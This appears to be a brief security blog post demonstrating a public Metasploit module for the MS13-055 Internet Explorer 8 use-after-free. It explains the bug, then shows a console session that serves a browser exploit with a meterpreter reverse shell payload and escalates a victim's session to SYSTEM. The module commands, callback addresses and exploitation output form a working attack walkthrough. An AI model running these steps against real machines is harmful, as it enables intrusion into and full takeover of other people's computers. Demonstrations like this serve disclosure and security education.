Metasploit MS13-055 Demo

Recently released Metasploit module for CVE-2013-3166.
I wouldn’t be surprised if exploit kits begin to leverage this vulnerability in the near future.

Description:
In IE8 standards mode, it’s possible to cause a use-after-free
condition by first creating an illogical table tree, where a
CPhraseElement comes after CTableRow, with the final node being a
sub table element. When the CPhraseElement’s outer content is reset
by using either outerText or outerHTML through an event handler,
this triggers a free of its child element (in this case, a
CAnchorElement, but some other objects apply too), but a reference
is still kept in function SRunPointer::SpanQualifier. This function
will then pass on the invalid reference to the next functions,
eventually used in mshtml!CElement::Doc when it’s trying to make a
call to the object’s SecurityContext virtual function at offset
+0x70, which results a crash. An attacker can take advantage of this
by first creating an CAnchorElement object, let it free, and then
replace the freed memory with another fake object. Successfully
doing so may allow arbitrary code execution under the context of the
user. This bug is specific to Internet Explorer 8 only. It was
originally discovered by Orange Tsai at Hitcon 2013, but was
silently patched in the July 2013 update.

References:
http://technet.microsoft.com/en-us/security/bulletin/ms13-055
https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf
http://blogs.technet.com/b/srd/archive/2013/07/10/running-in-the-wild-not-for-so-long.aspx?Redirected=true

Commands:

msf > use exploit/windows/browser/ms13_055_canchor
msf exploit(ms13_055_canchor) > set SRVHOST 192.168.23.54
msf exploit(ms13_055_canchor) > set URIPATH /
msf exploit(ms13_055_canchor) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms13_055_canchor) > set LHOST 192.168.23.56
msf exploit(ms13_055_canchor) > exploit
[*] Exploit running as background job.
msf exploit(ms13_055_canchor) >
[*] Started reverse handler on 192.168.23.194:4444
[*] Using URL: http://192.168.23.194:8080/
[*] Server started.
[*] 192.168.23.72 ms13_055_canchor – Using msvcrt ROP
[*] 192.168.23.72 ms13_055_canchor – Sending exploit…
[*] 192.168.23.72 ms13_055_canchor – Using msvcrt ROP
[*] 192.168.23.72 ms13_055_canchor – Sending exploit…
[*] Sending stage (752128 bytes) to 192.168.23.72
[*] Meterpreter session 1 opened (192.168.23.194:4444 -> 192.168.23.72:1048) at 2013-09-15 17:33:48 -0200
[*] Session ID 1 (192.168.23.194:4444 -> 192.168.23.72:1048) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: iexplore.exe (2088)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 616
[+] Successfully migrated to process
msf exploit(ms13_055_canchor) > sessions -i 1
meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM